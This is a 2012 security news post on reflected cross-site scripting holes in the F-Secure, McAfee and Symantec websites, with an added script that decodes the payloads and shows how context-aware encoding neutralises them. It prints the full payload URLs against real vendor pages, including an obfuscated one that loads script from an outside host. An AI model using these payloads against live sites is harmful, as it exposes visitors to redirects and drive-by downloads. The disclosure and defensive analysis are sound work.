F-Secure, McAfee and Symantec websites again XSSed
Written by DP
Friday, 13 January 2012

Once again, the websites of the three well-known antivirus vendors are vulnerable to cross-site scripting. The vulnerabilities were reported by "Zeitjak" and "dick" back in mid-April 2011 and still appear to work. They can be triggered on the latest Firefox but not on the latest Internet Explorer or Google Chrome, whose built-in reflected-XSS filters (IE's XSS Filter and Chrome's XSS Auditor) are enabled by default and block these payloads.
Because the injected script runs in the context of the vendor's own domain, an attacker can use these vulnerabilities to serve drive-by downloads to visitors and loyal customers, or simply to redirect them elsewhere, as the Symantec proof of concept below does.
F-Secure.com (http://www.xssed.com/mirror/72776/):
https://kb.f-secure.com/userSetSession.aspx?c=0&cpc=0&cid=0&t="><body+onload="document%2Ewrite(String.fromCharCode(60,115,99,114,105,112,116,47,115,114,99,61,104,116,116,112,58,47,47,122,46,108,46,116,111,62,60,47,115,99,114,105,112,116,62))"+ (TEST)
The payload closes the attribute the t parameter lands in with "> and opens a new body element; the String.fromCharCode() sequence decodes to <script/src=http://z.l.to></script>, which the onload handler writes into the page, so the script loads from an attacker-chosen host.
Past XSS vulns and News:
http://www.xssed.com/search?key=f-secure.com
McAfee.com (http://www.xssed.com/mirror/72724/):
http://go.mcafee.com/activation.cfm?firewall_id=" style="background-image:url('http://i.imgur.com/oHp8A.gif')" onfocus="document.write(String.fromCharCode(60)%2B'iframe src=http://xssed.com height=100%25 width=100%25>'%2BString.fromCharCode(60)%2B'/iframe>'%2BString.fromCharCode(60)%2B'script>alert(/XSS/)'%2BString.fromCharCode(60)%2B'/script>')" foo="bar (TEST)
Here the leading " stays inside the same tag and adds style and onfocus attributes to it. The onfocus handler uses document.write() to inject a full-page iframe of xssed.com followed by a script that calls alert(/XSS/); the angle brackets are built with String.fromCharCode(60) so that no literal < appears in the URL.
Past XSS vulns and News:
http://www.xssed.com/search?key=mcafee.com
Symantec.com (http://www.xssed.com/mirror/70522/):
https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_US";document.location="http://www.xssed.com";// (TEST)
Here the localeStr value is reflected into a JavaScript string literal rather than into HTML: "; closes the literal and the statement, document.location redirects the visitor to xssed.com, and // comments out whatever the page appends on the same line.
Past XSS vulns and News:
http://www.xssed.com/search?key=symantec.com
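To make the three injection contexts concrete, here is an added example that is not code from the original post, from xssed.com or from the vendors' sites. It takes the three parameter values above, decodes them the way a browser would, pastes them into an assumed server-side template for their output context (an HTML attribute for F-Secure and McAfee, a JavaScript string literal for Symantec), and contrasts the raw reflection with a context-aware encoded one. The templates, the parameter placement and every helper name (queryDecode, listTags, encodeForHtmlAttr, encodeForJsString, splitJsAssignment) are assumptions for illustration; the real vendor pages are not reproduced here.

```javascript
// Added example, not code from the original post or from the vendors' sites.
// ASSUMED templates and helper names; the real vendor pages are not reproduced.

// Parameter values copied from the mirrors above, joined onto one line.
const PAYLOADS = {
  fsecure_t: '"><body+onload="document%2Ewrite(String.fromCharCode(60,115,99,114,105,112,116,47,115,114,99,61,104,116,116,112,58,47,47,122,46,108,46,116,111,62,60,47,115,99,114,105,112,116,62))"+',
  mcafee_firewall_id: `" style="background-image:url('http://i.imgur.com/oHp8A.gif')" onfocus="document.write(String.fromCharCode(60)%2B'iframe src=http://xssed.com height=100%25 width=100%25>'%2BString.fromCharCode(60)%2B'/iframe>'%2BString.fromCharCode(60)%2B'script>alert(/XSS/)'%2BString.fromCharCode(60)%2B'/script>')" foo="bar`,
  symantec_localeStr: 'en_US";document.location="http://www.xssed.com";//',
};

// Query-string decoding: '+' is a space, %XX is a byte.
const queryDecode = s => decodeURIComponent(s.replace(/\+/g, ' '));

// Replace String.fromCharCode(60,115,...) with the string it builds, so the
// obfuscated document.write() argument becomes readable.
const revealFromCharCode = js =>
  js.replace(/String\.fromCharCode\(([\d,\s]+)\)/g, (_, codes) =>
    JSON.stringify(String.fromCharCode(...codes.split(',').map(Number))));

// Minimal tag/attribute tokenizer: which elements and attribute names does the
// HTML parser end up with after the reflection? Quoted values are honoured, so
// text that merely looks like `onfocus=` inside a quoted value does not count.
function listTags(html) {
  const tags = [], re = /<([a-zA-Z][\w-]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    let i = re.lastIndex;
    const attrs = [];
    while (i < html.length && html[i] !== '>') {
      if (/\s/.test(html[i])) { i++; continue; }
      let name = '';
      while (i < html.length && !/[\s=>]/.test(html[i])) name += html[i++];
      while (i < html.length && /\s/.test(html[i])) i++;
      if (html[i] === '=') {
        i++;
        while (i < html.length && /\s/.test(html[i])) i++;
        const q = html[i];
        if (q === '"' || q === "'") { i++; while (i < html.length && html[i] !== q) i++; i++; }
        else while (i < html.length && !/[\s>]/.test(html[i])) i++;
      }
      if (name) attrs.push(name.toLowerCase());
    }
    tags.push({ name: m[1].toLowerCase(), attrs });
    re.lastIndex = i;
  }
  return tags;
}

// ASSUMED vulnerable templates: the parameter is pasted into the page raw.
const renderAttrRaw = v => `<input type="hidden" name="p" value="${v}">`;
const renderJsRaw = v => `var localeStr = "${v}";`;

// The fix: encode for the context the value lands in. Attribute values get the
// five HTML-significant characters encoded; a JS string literal gets every
// non-alphanumeric character hex-escaped, so no quote, backslash, slash or
// angle bracket survives to close the literal or the <script> element.
const encodeForHtmlAttr = s => s.replace(/[&<>"']/g,
  c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' })[c]);
const encodeForJsString = s => s.replace(/[^A-Za-z0-9]/g, c => {
  const code = c.charCodeAt(0);
  return code < 256 ? '\\x' + code.toString(16).padStart(2, '0')
                    : '\\u' + code.toString(16).padStart(4, '0');
});
const renderAttrSafe = v => renderAttrRaw(encodeForHtmlAttr(v));
const renderJsSafe = v => renderJsRaw(encodeForJsString(v));

// Split `var localeStr = "...";` into the string literal the JS parser sees and
// whatever code follows it; anything other than '' there is attacker-controlled.
function splitJsAssignment(script) {
  const start = script.indexOf('"') + 1;
  let i = start;
  while (i < script.length && script[i] !== '"') i += script[i] === '\\' ? 2 : 1;
  const rest = script.slice(i + 1);
  return { literal: script.slice(start, i), injected: rest.startsWith(';') ? rest.slice(1) : rest };
}

// Undo \xHH / \uHHHH escapes: the encoded literal still carries the original
// value, just as data.
const decodeJsEscapes = lit => lit.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/g,
  (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));

function analyse() {
  const t = queryDecode(PAYLOADS.fsecure_t);
  const f = queryDecode(PAYLOADS.mcafee_firewall_id);
  const l = queryDecode(PAYLOADS.symantec_localeStr);
  return {
    fsecure: { raw: listTags(renderAttrRaw(t)), safe: listTags(renderAttrSafe(t)),
               onload: revealFromCharCode(t) },
    mcafee: { raw: listTags(renderAttrRaw(f)), safe: listTags(renderAttrSafe(f)) },
    symantec: { raw: splitJsAssignment(renderJsRaw(l)), safe: splitJsAssignment(renderJsSafe(l)) },
  };
}

function main() {
  const r = analyse(), show = tags => tags.map(x => `${x.name}[${x.attrs}]`).join(' ');
  console.log('F-Secure raw :', show(r.fsecure.raw), '| safe:', show(r.fsecure.safe));
  console.log('F-Secure onload:', r.fsecure.onload);
  console.log('McAfee raw   :', show(r.mcafee.raw), '| safe:', show(r.mcafee.safe));
  console.log('Symantec raw :', JSON.stringify(r.symantec.raw.injected), '| safe:', JSON.stringify(r.symantec.safe.injected));
}
main();
```

Run with node: the raw F-Secure render yields a second element (body with an onload attribute), the raw McAfee render gives the input three extra attributes (style, onfocus, foo), and the raw Symantec render leaves a document.location statement after the string literal; in all three encoded renders the attacker's text survives only as data inside the one attribute or literal it was meant for.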
One thing is certain: once such vulnerabilities go public, all three vendors usually do their best to fix them quickly.